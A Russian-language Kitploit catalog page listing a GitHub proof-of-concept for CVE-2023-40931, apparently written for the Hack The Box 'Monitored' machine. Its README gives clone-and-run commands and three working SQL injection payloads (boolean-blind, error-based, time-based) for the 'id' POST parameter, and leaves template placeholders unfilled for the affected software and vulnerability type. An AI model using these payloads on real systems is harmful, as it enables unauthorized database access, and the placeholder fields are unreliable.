Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

CVE-2023-40931: концептуальное доказательство для HTB MONITORED

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-40931 Доказательство концепции (PoC) 🚨

Этот репозиторий содержит доказательство концепции (PoC) для CVE-2023-40931, уязвимости безопасности, обнаруженной в [пострадавшем программном обеспечении/системе]. Цель этого репозитория — продемонстрировать уязвимость исключительно в образовательных и исследовательских целях. 🛠️

Отказ от ответственности ⚠️

Этот проект предназначен исключительно для образовательных целей и авторизованного тестирования. Неправомерное использование этого кода может привести к юридическим последствиям. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этим кодом. Всегда получайте надлежащее разрешение перед тестированием любой системы. 🔒

Подробности 📋

  • CVE ID: CVE-2023-40931
  • Тип уязвимости: [Тип уязвимости, например, Remote Code Execution, Privilege Escalation]
  • Затронутое ПО: [Название и версия затронутого ПО]
  • Серьезность: [Уровень серьезности, например, Critical, High] 🚩

Для получения дополнительной информации обратитесь к официальной записи CVE: CVE-2023-40931. 🔗

Использование 🚀

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    Параметр POST 'id' уязвим. Следующие полезные нагрузки успешно эксплуатировали уязвимость:

    • Boolean-based blind: Эта полезная нагрузка использует условное выражение для определения истинности запроса, что позволяет извлекать данные с помощью булевой логики.

      • Payload: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • Error-based: Эта полезная нагрузка использует сообщения об ошибках базы данных для извлечения информации путем вызова определенных ошибок.

      • Payload: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • Time-based blind: Эта полезная нагрузка использует временные задержки для получения информации путем наблюдения за временем ответа сервера.

      • Payload: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    Эти полезные нагрузки демонстрируют подверженность уязвимости атакам SQL-инъекций. Действуйте с осторожностью и убедитесь в наличии надлежащего разрешения перед тестированием. 🔒

  2. Следуйте инструкциям в файле exploit.py, чтобы выполнить PoC. 🧑‍💻

    Примечание: Убедитесь, что у вас установлены необходимые зависимости. ✅

Скачать инструмент